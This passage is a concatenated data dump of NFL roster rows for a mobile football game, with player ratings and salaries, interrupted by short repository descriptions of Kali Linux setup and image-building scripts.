Peterson,32,1986,41,71,81,75,90,84,1.300000,2 RB,Kerwynn Williams,26,1992,90,59,75,67,89,76,0.300000,1 RB,DJ Foster,24,1994,95,35,73,62,90,74,0.400000,2 RB,Elijhaa Penny,24,1994,82,45,65,68,81,75,0.300000,1 RB,Andre Ellington,28,1990,62,60,68,60,90,70,0.600000,1 RB,Ricky Seals-Jones,22,1996,80,35,71,57,83,62,0.300000,3 WR,Larry Fitzgerald,34,1984,44,95,93,95,84,71,11.500000,1 WR,John Brown,27,1991,75,67,68,77,94,76,0.700000,1 WR,Jaron Brown,27,1991,67,64,71,77,91,74,0.800000,1 WR,Chad Williams,23,1995,96,40,76,71,90,72,0.600000,4 WR,JJ Nelson,25,1993,74,63,62,71,96,67,0.400000,2 WR,Jermaine Gresham,29,1989,83,64,77,75,81,72,5.500000,4 WR,Brittan Golden,29,1989,71,54,71,63,88,67,0.400000,1 WR,Troy Niklas,25,1993,68,40,73,63,77,63,0.800000,1 OL,Jared Veldheer,30,1988,90,68,77,95,74,59,5.300000,2 OL,Mike Iupati,30,1988,79,64,79,85,86,59,5.800000,3 OL,Alex Boone,30,1988,76,62,71,81,74,62,0.600000,1 OL,DJ Humphries,24,1994,70,54,75,77,81,60,2.100000,2 OL,John Wetzel,26,1992,84,52,70,75,79,58,0.300000,1 OL,AQ Shipley,31,1987,72,75,77,76,74,59,1.300000,2 OL,Earl Watford,27,1991,73,61,81,73,73,57,0.500000,1 OL,Evan Boehm,24,1994,66,60,81,70,77,59,0.500000,3 OL,Max Tuerk,23,1995,98,45,75,64,81,62,0.700000,3 OL,Will Holden,24,1994,80,40,75,64,77,35,0.500000,4 OL,Justin Drescher,29,1989,65,60,75,60,52,56,0.600000,1 K,Andy Lee,35,1983,73,45,67,93,84,45,2.400000,2 K,Phil Dawson,42,1976,60,45,63,85,89,45,2.200000,2 S,Tyrann Mathieu,25,1993,90,73,73,82,90,70,9.800000,5 S,Tyvon Branch,31,1987,81,73,76,80,90,70,2.200000,1 S,Budda Baker,21,1997,83,45,79,75,91,68,1.600000,4 S,Antoine Bethea,33,1985,40,65,75,77,86,70,3.100000,3 S,Rudy Ford,23,1995,80,40,76,72,92,70,0.400000,4 CB,Patrick Peterson,27,1991,77,77,87,91,92,47,10.700000,4 CB,Justin Bethel,27,1991,61,59,76,80,87,55,2.300000,1 CB,Brandon Williams,25,1993,82,45,81,75,93,40,0.600000,3 CB,Tramon Williams,34,1984,65,60,81,79,84,40,1.600000,1 CB,Grady Zirk,29,2010,68,76,71,66,64,55,0.500000,1 CB,Johnathan Sammis,32,2007,66,94,73,56,68,57,0.500000,1 LB,Karlos Dansby,36,1982,73,67,77,79,89,68,1.700000,1 LB,Chandler Jones,27,1991,69,81,76,71,86,79,12.200000,5 LB,Deone Bucannon,25,1993,87,70,81,71,83,77,2.700000,2 LB,Josh Bynes,28,1990,77,64,71,73,83,68,0.500000,1 LB,Kareem Martin,25,1993,79,45,71,67,83,68,0.500000,1 LB,Markus Golden,26,1992,93,73,75,64,77,71,0.800000,2 LB,Scooby Wright III,23,1995,82,59,70,64,81,71,0.300000,1 LB,Haason Reddick,23,1995,94,58,77,30,83,45,3.300000,4 DL,Corey Peters,29,1989,74,75,68,77,90,72,2.300000,1 DL,Josh Mauro,26,1992,64,60,81,73,85,68,2.100000,2 DL,Robert Nkemdiche,23,1995,70,56,75,67,83,77,2.000000,3 DL,Xavier Williams,25,1993,90,54,75,70,82,66,0.300000,1 DL,Frostee Rucker,34,1984,43,68,71,65,86,72,0.700000,1 DL,Olsen Pierre,26,1992,84,45,68,64,82,69,0.300000,1 DL,Rodney Gunter,25,1993,73,54,67,60,81,71,0.500000,2 DL,Wilford Bedney,30,2009,70,89,109,66,60,68,0.500000,1 END_PLAYERS Los Angeles Rams,LAR QB,Jared Goff,23,1995,86,71,83,85,81,40,7.300000,3 QB,Brandon Allen,25,1993,97,40,70,77,74,37,0.400000,3 QB,Sean Mannion,25,1993,67,40,76,77,74,37,0.600000,2 RB,Todd Gurley,23,1995,85,81,75,79,92,86,3.500000,2 RB,Lance Dunbar,27,1991,84,60,64,63,91,76,0.900000,1 RB,Justin Davis,22,1996,88,40,73,61,88,76,0.300000,3 RB,Malcolm Brown,24,1994,88,40,73,65,89,70,0.300000,1 RB,Tyler Higbee,24,1994,95,60,77,61,80,70,0.600000,3 WR,Sammy Watkins,24,1994,78,64,79,75,92,80,5.100000,1 WR,Cooper Kupp,24,1994,88,60,79,76,87,74,0.700000,4 WR,Robert Woods,25,1993,80,67,81,75,91,71,4.300000,5 WR,Josh Reynolds,22,1996,74,45,75,73,88,67,0.600000,4 WR,Gerald Everett,23,1995,76,45,75,70,85,72,1.300000,4 WR,Tavon Austin,26,1992,72,62,76,62,95,75,6.400000,5 WR,Derek Carrier,27,1991,67,57,70,62,87,69,0.600000,1 WR,Pharoh Cooper,22,1996,70,45,75,63,87,63,0.500000,3 WR,Mike Thomas,23,1995,97,40,79,61,88,63,0.400000,3 OL,Andrew Whitworth,36,1982,61,91,81,89,86,73,8.100000,3 OL,Jamon Brown,24,1994,97,60,68,76,82,58,0.600000,2 OL,Rob Havenstein,25,1993,66,73,73,71,87,60,0.800000,2 OL,John Sullivan,32,1986,53,70,85,75,77,60,0.700000,1 OL,Rodger Saffold,29,1989,90,65,65,71,85,59,4.500000,2 OL,Austin Blythe,25,1993,75,40,89,68,80,60,0.400000,3 OL,Darrell Williams,24,1994,93,40,70,60,77,63,0.300000,1 OL,Andrew Donnal,25,1993,73,52,71,62,75,60,0.500000,2 OL,Cornelius Lucas,26,1992,72,57,65,60,77,60,0.400000,1 OL,Jake McQuaide,30,1988,88,45,68,59,50,45,0.600000,1 K,Johnny Hekker,27,1991,79,57,73,95,96,57,2.000000,4 K,Greg Zuerlein,30,1988,65,45,70,91,89,45,1.600000,3 S,John Johnson,22,1996,94,52,81,77,85,70,0.600000,4 S,Cody Davis,28,1990,75,54,71,77,90,67,0.900000,1 S,Lamarcus Joyner,27,1991,62,70,77,79,88,63,1.100000,1 S,Marqui Christian,23,1995,83,40,76,71,88,70,0.400000,3 S,Blake Countess,24,1994,75,35,71,71,88,43,0.300000,2 CB,Trumaine Johnson,27,1991,73,73,70,80,88,63,10.500000,1 CB,Kayvon Webster,26,1992,69,61,83,77,90,67,2.400000,2 CB,Nickell Robey,25,1993,99,68,76,84,89,37,0.600000,1 CB,Troy Hill,26,1992,88,45,76,77,87,40,0.400000,1 CB,Vicente Golomb,28,2011,59,89,92,69,65,65,0.500000,1 CB,Dominique Hatfield,23,1995,82,40,73,69,85,40,0.300000,3 LB,Alec Ogletree,26,1992,78,65,76,75,81,77,2.500000,1 LB,Mark Barron,28,1990,73,63,75,70,81,76,6.300000,4 LB,Samson Ebukam,22,1996,97,45,79,67,85,74,0.600000,4 LB,Bryce Hager,25,1993,87,45,70,70,84,70,0.400000,2 LB,Robert Quinn,27,1991,82,70,76,65,87,76,7.700000,3 LB,Connor Barwin,31,1987,68,62,83,64,83,76,2.200000,1 LB,Ejuan Price,24,1994,98,45,65,63,81,67,0.400000,4 LB,Matt Longacre,26,1992,90,50,75,60,77,69,0.400000,1 LB,Cory Littleton,24,1994,76,45,70,56,72,69,0.300000,2 DL,Aaron Donald,26,1992,78,81,85,91,96,84,3.000000,2 DL,Michael Brockers,27,1991,76,75,77,76,91,77,7.200000,3 DL,Morgan Fox,23,1995,93,45,79,71,86,75,0.300000,1 DL,Dominique Easley,25,1993,98,64,62,70,84,71,1.100000,1 DL,Ethan Westbrooks,27,1991,90,61,68,68,80,69,1.100000,1 DL,Tyrunn Walker,27,1991,86,50,65,68,81,68,0.500000,1 DL,Tanzel Smart,23,1995,82,54,70,67,81,67,0.400000,4 DL,Xavier Coonfare,27,2012,67,64,68,65,66,56,0.500000,1 END_PLAYERS Seattle Seahawks,SEA QB,Russell Wilson,29,1989,85,79,95,87,86,71,14.800000,3 QB,Austin Davis,28,1990,88,50,76,73,77,45,0.600000,1 RB,Christopher Carson,23,1995,89,62,68,79,86,77,0.400000,4 RB,Eddie Lacy,27,1991,74,62,81,75,86,79,3.600000,1 RB,CJ Prosise,23,1995,83,54,71,65,90,77,0.600000,3 RB,Thomas Rawls,24,1994,69,60,67,73,80,76,0.300000,1 RB,JD McKissic,24,1994,75,45,75,57,88,71,0.300000,1 RB,Nick Vannett,24,1994,68,40,71,60,76,67,0.600000,3 WR,Doug Baldwin,29,1989,81,91,77,89,90,70,6.600000,4 WR,Tyler Lockett,25,1993,99,64,70,75,93,75,0.600000,2 WR,Paul Richardson,25,1993,81,64,72,73,94,72,1.000000,1 WR,Jimmy Graham,31,1987,61,75,75,77,85,75,6.300000,1 WR,Amara Darboh,23,1995,93,52,77,68,91,72,0.600000,4 WR,Luke Willson,27,1991,85,60,68,68,87,67,1.600000,1 WR,Tanner McEvoy,24,1994,89,45,76,64,87,71,0.300000,2 OL,Duane Brown,32,1986,51,85,81,81,87,75,5.600000,2 OL,Jordan Roos,24,1994,85,40,71,86,77,57,0.300000,3 OL,Mark Glowinski,25,1993,90,56,79,83,73,57,0.500000,2 OL,Justin Britt,26,1992,80,81,71,83,83,72,5.200000,4 OL,Luke Joeckel,26,1992,78,59,75,76,74,65,7.200000,1 OL,Ethan Pocic,22,1996,80,56,79,80,80,71,0.900000,4 OL,Germain Ifedi,23,1995,81,62,75,68,72,61,1.900000,3 OL,Matt Tobin,27,1991,66,52,73,64,75,60,0.500000,1 OL,Oday Aboushi,26,1992,89,63,81,63,73,60,0.700000,1 OL,Tyler Ott,25,1993,88,35,71,58,50,40,0.300000,1 K,Blair Walsh,27,1991,78,40,75,70,78,40,0.700000,1 K,Jon Ryan,36,1982,52,45,68,79,82,45,1.900000,3 S,Earl Thomas III,28,1990,73,83,83,88,91,72,6.900000,2 S,Kam Chancellor,29,1989,71,83,89,82,87,79,8.400000,4 S,Brad McDougald,27,1991,72,67,75,79,88,68,1.600000,1 S,Tedric Thompson,22,1996,72,45,73,74,86,67,0.600000,4 S,Delano Hill,22,1996,78,45,77,70,86,72,0.600000,4 CB,Richard Sherman,29,1989,61,83,93,91,88,66,10.500000,2 CB,Shaquill Griffin,22,1996,82,54,77,80,92,62,0.600000,4 CB,DeShawn Shead,29,1989,82,68,73,77,87,68,0.800000,1 CB,Justin Coleman,24,1994,77,58,75,79,88,53,0.400000,1 CB,Jeremy Lane,27,1991,61,61,73,79,88,44,4.400000,3 CB,Neiko Thorpe,27,1991,62,40,76,74,90,43,1.300000,2 LB,Bobby Wagner,27,1991,78,87,81,95,89,84,8.000000,3 LB,KJ Wright,28,1990,67,75,81,85,84,75,5.000000,2 LB,Michael Wilhoite,31,1987,79,61,76,70,81,74,1.300000,1 LB,DJ Alexander,26,1992,76,45,64,63,75,72,0.400000,2 LB,Marcus Smith II,25,1993,84,56,73,61,79,70,0.400000,1 LB,Terence Garvin,26,1992,66,45,75,63,76,68,0.600000,1 LB,Josh Forrest,25,1993,86,40,81,56,70,68,0.300000,1 DL,Michael Bennett,32,1986,51,71,77,81,94,79,7.100000,4 DL,Jarran Reed,25,1993,83,59,76,81,92,72,1.000000,3 DL,Sheldon Richardson,27,1991,86,63,75,79,94,79,3.200000,1 DL,Nazair Jones,23,1995,98,57,70,76,86,69,0.600000,4 DL,Frank Clark,24,1994,81,63,65,77,80,71,0.700000,2 DL,Garrison Smith,26,1992,89,40,75,75,85,66,0.300000,1 DL,Quinton Jefferson,24,1994,86,40,71,64,81,74,0.400000,3 DL,Cliff Avril,31,1987,72,76,79,88,77,76,4.700000,2 DL,Dwight Freeney,37,1981,61,61,65,60,75,72,0.600000,1 DL,Dion Jordan,27,1991,83,45,67,75,77,80,0.400000,1 END_PLAYERS San Francisco 49ers,SF QB,Jimmy Garoppolo,26,1992,86,65,85,81,81,43,0.700000,1 QB,CJ Beathard,24,1994,74,45,75,83,77,55,0.700000,4 RB,Carlos Hyde,26,1992,81,73,76,76,89,84,0.700000,1 RB,Matt Breida,22,1996,86,52,73,70,93,75,0.300000,3 RB,Raheem Mostert,25,1993,83,45,75,58,93,71,0.400000,1 RB,Kyle Juszczyk,26,1992,89,73,83,65,82,71,4.100000,4 WR,Pierre Garcon,31,1987,75,91,76,91,89,74,7.400000,5 WR,Trent Taylor,23,1995,89,45,77,75,86,76,0.400000,4 WR,Marquise Goodwin,27,1991,66,63,68,67,95,67,2.700000,2 WR,George Kittle,24,1994,67,60,73,68,87,66,0.500000,4 WR,Aldrick Robinson,29,1989,62,60,70,64,92,70,1.300000,2 WR,Kendrick Bourne,22,1996,90,40,67,62,87,71,0.300000,3 WR,Victor Bolden Jr.,22,1996,77,40,76,63,90,67,0.300000,3 WR,Garrett Celek,29,1989,70,50,65,63,80,63,2.000000,3 OL,Trent Brown,24,1994,98,76,65,83,80,77,0.400000,2 OL,Joe Staley,33,1985,70,89,81,85,83,63,5.000000,3 OL,Brandon Fusco,29,1989,85,60,65,79,85,60,0.900000,1 OL,Daniel Kilgore,30,1988,90,64,75,79,72,60,1.100000,1 OL,Laken Tomlinson,25,1993,68,60,75,76,74,60,2.000000,2 OL,Joshua Garnett,23,1995,69,61,77,71,74,59,2.200000,3 OL,Erik Magnuson,23,1995,95,45,67,67,75,60,0.300000,3 OL,Zane Beadles,31,1987,72,62,81,70,72,56,2.600000,2 OL,Darrell Williams,24,1994,97,40,75,63,74,60,0.300000,1 OL,Kyle Nelson,31,1987,70,50,71,54,52,45,0.700000,2 K,Robbie Gould,36,1982,54,40,65,89,85,40,1.400000,2 K,Bradley Pinion,23,1995,78,40,67,83,76,40,0.400000,2 S,Jimmie Ward,26,1992,67,63,81,79,90,67,2.500000,2 S,Jaquiski Tartt,25,1993,80,67,79,79,89,59,1.100000,2 S,Eric Reid,26,1992,65,63,76,79,88,60,2.500000,1 S,Dexter McCoil,26,1992,88,45,81,71,86,62,0.300000,2 S,Adrian Colbert,24,1994,74,40,75,70,89,45,0.400000,4 CB,Leon Hall,33,1985,55,56,79,74,87,60,0.600000,1 CB,Dontae Johnson,26,1992,61,56,76,79,91,40,0.500000,1 CB,Ahkello Witherspoon,22,1996,88,45,71,79,91,37,0.800000,4 CB,K'Waun Williams,26,1992,84,52,76,77,88,44,0.400000,1 CB,Ha-Ha Krauskopf,28,2011,79,73,96,65,62,63,0.500000,1 CB,Weldon Kindig,22,2017,58,82,74,59,60,66,0.500000,1 LB,Reuben Foster,23,1995,69,59,68,73,88,74,2.100000,4 LB,Malcolm Smith,28,1990,80,67,70,68,81,77,4.200000,5 LB,Ray-Ray Armstrong,26,1992,93,60,71,67,76,72,1.100000,2 LB,Brock Coyle,27,1991,76,56,81,64,81,74,1.200000,1 LB,Elijah Lee,21,1997,88,40,81,65,77,70,0.400000,4 LB,Eli Harold,23,1995,76,50,75,62,81,72,0.600000,2 LB,Dekoda Watson,29,1989,85,45,65,60,72,72,1.300000,3 LB,Pita Taumoepenu,23,1995,99,40,79,58,77,67,0.400000,4 DL,Solomon Thomas,22,1996,88,54,85,83,90,79,7.300000,4 DL,Tank Carradine,27,1991,76,64,68,81,89,79,2.400000,1 DL,DeForest Buckner,23,1995,67,75,83,75,89,77,4.600000,3 DL,DJ Jones,22,1996,66,40,79,79,85,72,0.400000,4 DL,Tony McDaniel,32,1986,59,64,64,77,89,66,0.600000,1 DL,Arik Armstead,24,1994,70,62,68,73,88,75,2.400000,2 DL,Ronald Blair,24,1994,89,40,76,71,84,75,0.500000,3 DL,Leger Douzable,31,1987,66,64,67,70,86,68,0.600000,1 DL,Datone Jones,27,1991,89,61,71,67,79,71,0.500000,1 DL,Earl Mitchell,30,1988,50,58,70,65,82,75,3.000000,4 DL,Elvis Dumervil,33,1985,72,64,73,63,81,74,2.800000,2 DL,Aaron Lynch,24,1994,72,60,67,61,80,76,0.600000,1 END_PLAYERS
elreydetoda
This is a repository that will be used to help create a process of a new kali vagrant box for hashicorp each week.
ghostwond3r
Automated task after new installation of Kali Linux + NewBlood helper
D4RkNiK0l4s
Kali Linux Generator its a script that automates the building process of kali linux images (iso)!!! Added compability to create Kali linux: jessie,wheezy,sid,squeeze Added Desktops Building Capabilities E17 option Desktops Building Capabilities : XFCE,KDE,ICEWM,GNOME,MATE,LXDE,E17 option 1 :You can just build a Kali Linux image with any of the folowing desktop XFCE,KDE,ICEWM,GNOME,MATE,LXDE,E17 or option 2 : the created iso will be remixed (if you choose to remix distributions) with the current installed system ,what does this mean?? it mean that you will get a kali linux image with your current settings,wallpapers,documents(something like backup to a new operating system No comments.. this script is what any lazy people out there needs!! Youtube tutorial/preview : soon
mr-r3b00t
Some bash to make life easier after a new kali install..
GuilhermeSAlves
## Antdroid/Minotauri NFL Roster for 2017-18 Season ## version 1.4 (09-13-2017) ##Changelog ##v1.0 Initial Release ##v1.11 Fixed extra comma bug affecting iOS and players with initials for first name ##v1.20: Randomized Potential based on Age ##v1.30 Fixed Player Salaries; New Coverage Formula; Using PFC-Converter v1.2 ##v1.40 Normalizing Salaries to avoid salary cap issues ## http://www.AntDroid.net ###################################################################### RAVENS Baltimore Ravens,BAL OL,Morgan Cox,31,2010,69,73,83,64,51,66,0.7,4 WR,Benjamin Watson,37,2004,68,82,86,85,80,73,2.2,1 K,Justin Tucker,28,2012,68,70,84,98,98,70,3.4,3 QB,Ryan Mallett,29,2011,76,62,87,94,74,42,1.8,1 S,Eric Weddle,32,2007,74,93,92,87,85,81,4.9,3 CB,Brandon Carr,31,2008,74,80,90,86,87,77,4.1,4 CB,Jimmy Smith,29,2011,78,88,89,89,89,84,9.1,3 OL,Austin Howard,30,2010,76,77,84,87,91,77,3.2,3 WR,Jeremy Maclin,29,2009,71,82,84,91,92,83,4.8,2 RB,Danny Woodhead,32,2008,68,83,82,80,88,81,2.2,3 S,Lardarius Webb,32,2009,65,77,87,87,90,63,1.5,3 LB,Terrell Suggs,35,2003,44,84,92,91,94,79,5.1,2 K,Sam Koch,35,2006,67,72,80,91,93,72,2.4,4 OL,Marshal Yanda,33,2007,79,98,93,93,94,87,5.7,2 QB,Joe Flacco,32,2008,79,78,95,97,80,59,19,2 WR,Mike Wallace,31,2009,77,86,89,85,92,80,5.4,1 DL,Brandon Williams,28,2013,71,90,80,96,95,81,7.8,5 S,Anthony Levine Sr.,30,2010,72,77,83,85,86,66,0.9,3 LB,Steven Johnson,29,2012,59,66,85,82,77,77,0.5,1 OL,Ryan Jensen,26,2013,81,77,88,90,92,74,1.1,1 S,Tony Jefferson,25,2013,81,91,84,85,84,80,6.6,4 OL,Luke Bowanko,26,2014,69,65,82,86,83,74,0.4,1 LB,CJ Mosley,25,2014,83,85,89,93,84,86,2.8,2 DL,Brent Urban,26,2014,80,74,77,79,81,81,0.4,1 RB,Terrance West,26,2014,83,86,90,85,88,86,1.1,1 WR,Michael Campanaro,26,2014,77,73,83,82,90,77,0.9,1 OL,James Hurst,26,2014,73,79,81,78,73,73,0.9,1 RB,Javorius Allen,26,2015,71,73,85,83,88,81,0.5,2 WR,Breshad Perriman,24,2015,81,68,78,78,95,83,2,2 WR,Vince Mayle,26,2015,66,51,85,78,83,81,0.3,1 RB,Maxx Williams,23,2015,75,65,83,75,80,78,0.8,2 WR,Nick Boyle,24,2015,81,75,89,82,72,66,0.4,2 LB,Za'Darius Smith,25,2015,73,74,87,80,82,76,0.5,2 DL,Carl Davis,25,2015,73,77,78,88,87,77,0.5,2 RB,Alex Collins,23,2016,78,75,89,74,88,83,0.4,3 RB,Kenneth Dixon,23,2016,86,73,87,85,87,88,0.5,3 OL,Ronnie Stanley,23,2016,92,85,88,87,89,77,5,3 LB,Matt Judon,25,2016,73,63,83,80,86,76,0.4,3 DL,Bronson Kaufusi,26,2016,69,62,89,81,82,83,0.6,3 DL,Willie Henry,23,2016,74,68,84,86,87,86,0.5,3 LB,Kamalei Correa,23,2016,76,69,87,82,82,81,1.2,3 CB,Maurice Canady,23,2016,67,55,86,81,89,79,0.4,3 CB,Tavon Young,23,2016,82,76,89,85,90,71,0.5,3 WR,Chris Moore,24,2016,78,58,86,77,90,73,0.5,3 DL,Michael Pierce,25,2016,82,85,84,94,92,84,0.3,2 OL,Matt Skura,24,2016,74,68,87,86,74,73,0.3,2 LB,Patrick Onwuasor,25,2016,69,71,88,79,80,81,0.3,1 DL,Chris Wormley,24,2017,69,63,86,83,83,86,0.7,4 LB,Tim Williams,24,2017,71,64,84,76,80,79,0.6,4 LB,Tyus Bowser,22,2017,67,63,87,79,80,80,1.2,4 CB,Marlon Humphrey,21,2017,70,70,88,84,92,82,2.8,4 OL,Jermaine Eluemunor,23,2017,77,56,91,92,74,74,0.4,4 S,Chuck Clark,22,2017,66,55,89,78,88,70,0.4,4 CB,Jaylen Hill,23,2017,78,57,80,79,84,68,0.3,3 DL,Patrick Ricard,23,2017,75,63,82,90,88,82,0.3,3 END_PLAYERS ###################################################################### BENGALS0 Cincinnati Bengals,CIN DL,Carlos Dunlap,28,2010,69,84,82,79,84,89,4.9,2 DL,Geno Atkins,29,2010,79,93,85,90,90,84,8.2,2 OL,Andre Smith,30,2009,79,67,86,95,75,73,2.9,1 DL,Michael Johnson,30,2009,67,76,83,73,80,88,3.7,2 K,Kevin Huber,32,2009,63,57,83,88,75,57,1.9,1 CB,Adam Jones,34,2005,61,79,87,87,87,68,4.8,2 OL,Clark Harris,33,2007,42,68,84,74,54,62,0.6,1 DL,Pat Sims,32,2008,65,76,84,89,88,79,0.7,1 QB,Andy Dalton,30,2011,80,82,94,92,83,56,11,4 WR,AJ Green,29,2011,78,98,93,95,91,89,9,3 OL,Clint Boling,28,2011,73,78,92,87,74,82,3.4,3 WR,Brandon LaFell,31,2010,67,84,89,88,86,80,2.7,2 WR,Tyler Eifert,27,2013,84,88,85,89,84,78,2.9,1 RB,Giovani Bernard,26,2013,84,81,82,82,91,85,2.9,3 LB,Kevin Minter,27,2013,84,86,86,84,84,82,3.8,1 S,Shawn Williams,26,2013,80,76,90,85,90,81,2.7,4 OL,Eric Winston,34,2006,66,75,88,82,75,73,0.6,1 LB,Vincent Rey,30,2010,69,81,89,90,84,80,2.1,2 CB,Dre Kirkpatrick,28,2012,69,81,85,86,88,64,7.1,5 K,Randy Bullock,28,2012,65,55,77,94,82,55,0.5,2 S,George Iloka,27,2012,86,82,88,85,85,65,4,4 LB,Vontaze Burfict,27,2012,88,90,95,90,88,81,3.3,1 OL,TJ Johnson,27,2013,66,64,84,86,73,76,1.1,2 QB,AJ McCarron,27,2014,70,76,92,86,80,53,0.4,1 DL,Chris Smith,25,2014,64,52,84,85,85,86,0.4,1 CB,Darqueze Dennard,26,2014,81,75,89,85,92,82,1.8,1 RB,Jeremy Hill,25,2014,84,82,89,86,88,85,0.7,1 OL,Russell Bodine,25,2014,86,82,89,97,73,72,0.6,1 RB,Ryan Hewitt,26,2014,77,71,88,69,77,69,1.4,3 WR,Tyler Kroft,25,2015,74,69,79,81,81,74,0.5,2 WR,CJ Uzomah,24,2015,76,64,86,77,85,75,0.4,2 OL,Cedric Ogbuehi,25,2015,76,76,77,82,73,73,2.1,2 OL,Jake Fisher,24,2015,84,77,83,83,73,73,0.8,2 CB,Josh Shaw,25,2015,77,65,80,82,90,79,0.5,2 OL,Trey Hopkins,25,2014,76,69,83,87,73,72,0.3,2 WR,Tyler Boyd,23,2016,78,76,85,86,88,69,0.8,3 OL,Christian Westerman,24,2016,67,58,87,88,77,74,0.4,3 OL,Alex Redmond,22,2016,71,54,78,86,72,71,0.3,2 LB,Nick Vigil,24,2016,67,63,89,87,80,77,0.6,3 CB,William Jackson III,25,2016,71,65,86,85,92,61,2.2,3 S,KeiVarae Russell,24,2016,66,59,86,83,89,69,0.5,3 DL,Andrew Billings,22,2016,65,57,83,91,87,80,0.5,3 WR,Cody Core,23,2016,81,64,85,80,90,73,0.4,3 S,Clayton Fejedelem,24,2016,77,64,91,81,87,70,0.4,3 WR,Alex Erickson,25,2016,64,50,86,80,88,74,0.3,2 RB,Joe Mixon,21,2017,81,68,91,85,91,87,1.1,4 WR,John Ross,22,2017,75,71,86,83,98,77,4.1,4 DL,Jordan Willis,22,2017,74,63,91,85,87,89,0.6,4 LB,Carl Lawson,22,2017,82,70,81,80,87,76,0.6,4 DL,Ryan Glasgow,24,2017,73,68,83,88,87,76,0.5,4 WR,Josh Malone,21,2017,80,64,86,83,92,69,0.5,4 K,Marshall Koehn,25,2016,67,50,68,50,88,50,0.3,2 LB,Hardy Nickerson,23,2017,66,53,88,86,82,74,0.3,3 LB,Jordan Evans,22,2017,78,59,88,77,79,81,0.4,4 RB,Cethan Carter,24,2017,59,46,82,71,83,71,0.3,3 END_PLAYERS ###################################################################### BROWNS Cleveland Browns,CLE K,Britton Colquitt,32,2009,70,62,82,88,81,62,1.7,4 OL,Joe Thomas,33,2007,64,98,97,93,86,95,6.9,2 LB,Jamie Collins,28,2013,71,79,90,87,83,86,8.2,4 CB,Jamar Taylor,27,2013,73,75,89,86,92,70,2.9,3 WR,Kenny Britt,29,2009,73,79,89,85,86,83,5.8,4 CB,Jason McCourty,30,2009,70,85,82,88,92,84,2.2,2 OL,JC Tretter,26,2013,76,78,86,89,74,74,4.2,3 OL,Kevin Zeitler,27,2012,74,84,92,91,75,81,8.6,5 LB,Tank Carder,28,2012,59,64,90,83,77,79,0.8,1 OL,Charley Hughlett,27,2014,77,65,82,75,70,67,0.6,6 OL,Marcus Martin,24,2014,76,77,84,82,73,72,1.1,1 OL,Joel Bitonio,26,2014,85,86,91,86,77,89,5.2,6 LB,Christian Kirksey,25,2014,78,84,85,92,82,86,5.3,5 RB,Isaiah Crowell,24,2014,78,78,87,87,89,85,1.6,1 DL,Jamie Meder,26,2014,75,76,90,87,83,79,0.3,1 RB,Duke Johnson,24,2015,77,80,83,80,90,85,0.6,2 WR,Sammie Coates,24,2015,67,64,88,77,91,81,0.5,2 WR,Randall Telfer,25,2015,66,66,79,76,78,75,0.4,2 OL,Austin Reiter,26,2015,62,56,85,77,79,72,0.3,1 DL,Nate Orchard,24,2015,84,69,88,76,73,81,0.9,2 DL,Danny Shelton,24,2015,83,84,85,95,95,79,2.8,2 S,Derron Smith,25,2015,77,65,82,80,85,54,0.4,2 LB,Josh Keyes,24,2015,65,52,87,73,77,75,0.3,1 DL,TY McGill,25,2015,79,68,87,85,85,81,0.3,1 WR,Kasen Williams,25,2015,65,62,77,80,85,72,0.3,1 QB,Kevin Hogan,25,2016,68,73,93,86,77,69,0.3,1 QB,Cody Kessler,24,2016,76,66,89,89,76,50,0.6,3 RB,Dan Vitale,24,2016,72,61,88,73,85,78,0.3,2 WR,Corey Coleman,23,2016,77,76,87,83,93,78,2.7,3 WR,Rashard Higgins,23,2016,71,63,89,82,85,73,0.4,3 OL,Spencer Drango,25,2016,74,75,90,83,79,76,0.4,3 OL,Shon Coleman,26,2016,65,66,83,86,84,74,0.6,3 DL,Emmanuel Ogbah,24,2016,79,65,88,77,82,88,1.4,3 DL,Carl Nassib,24,2016,73,66,86,75,76,83,0.7,3 LB,Joe Schobert,24,2016,82,72,90,72,77,79,0.5,3 CB,Briean Boddy-Calhoun,24,2016,81,83,85,87,90,68,0.3,2 WR,Ricardo Louis,23,2016,76,70,88,81,91,74,0.5,3 S,Derrick Kindred,24,2016,89,79,89,85,89,77,0.5,3 WR,Seth DeValve,24,2016,75,70,86,82,83,76,0.5,3 RB,Darius Jackson,24,2016,62,48,88,82,92,79,0.4,3 CB,Darius Hillary,24,2016,70,46,82,76,87,62,0.3,2 CB,Michael Jordan,25,2016,73,60,84,81,85,66,0.3,2 LB,James Burgess,23,2016,65,60,85,81,83,75,0.3,2 QB,DeShone Kizer,21,2017,79,64,94,95,75,76,1,4 RB,Matt Dayes,22,2017,66,54,84,71,84,73,0.4,4 WR,David Njoku,21,2017,73,65,86,82,85,79,2.2,4 OL,Zach Banner,24,2017,78,62,81,90,81,74,0.5,4 K,Zane Gonzalez,22,2017,75,51,79,96,78,51,0.4,4 DL,Myles Garrett,22,2017,78,70,84,96,89,88,7.6,4 DL,Caleb Brantley,23,2017,76,56,84,89,88,80,0.4,4 DL,Larry Ogunjobi,23,2017,77,70,87,88,86,84,0.7,4 S,Kai Nacua,22,2017,70,53,88,82,88,66,0.3,1 S,Jabrill Peppers,22,2017,73,68,89,84,90,79,2.4,4 CB,Howard Wilson,22,2017,64,57,86,80,87,74,0.5,4 DL,Trevon Coley,23,2016,72,65,84,85,86,87,0.3,2 END_PLAYERS ###################################################################### STEELERS Pittsburgh Steelers,PIT LB,Arthur Moats,29,2010,69,67,84,76,75,77,1.9,1 CB,Joe Haden,28,2010,71,80,93,90,89,68,6.5,3 OL,Marcus Gilbert,29,2011,82,90,86,91,74,86,4.6,3 DL,Cameron Heyward,28,2011,75,90,89,90,92,84,7.3,4 DL,Tyson Alualu,30,2010,75,81,86,86,87,82,2.2,2 WR,Darrius Heyward-Bey,30,2009,73,81,86,79,91,81,0.8,2 S,Mike Mitchell,30,2009,70,78,91,84,87,70,3.6,2 WR,Justin Hunter,26,2013,74,66,81,76,90,78,0.6,1 WR,Vance McDonald,27,2013,69,66,83,79,83,73,4,5 S,JJ Wilcox,26,2013,79,75,86,84,88,78,1.9,2 OL,Maurkice Pouncey,28,2010,86,92,85,91,77,75,6.8,3 QB,Ben Roethlisbergr,35,2004,72,85,95,95,85,72,16.4,3 LB,James Harrison,39,2002,60,83,90,85,95,76,1.2,2 CB,William Gay,32,2007,73,86,90,86,88,84,1.9,2 OL,Ramon Foster,31,2009,73,94,84,88,72,85,2.5,2 QB,Landry Jones,28,2013,74,58,89,91,77,43,1.5,2 OL,David DeCastro,27,2012,92,94,92,94,96,84,8.2,5 CB,Coty Sensabaugh,29,2012,70,70,87,86,90,47,0.9,2 S,Robert Golden,27,2012,76,70,87,83,87,68,1.2,2 LB,LJ 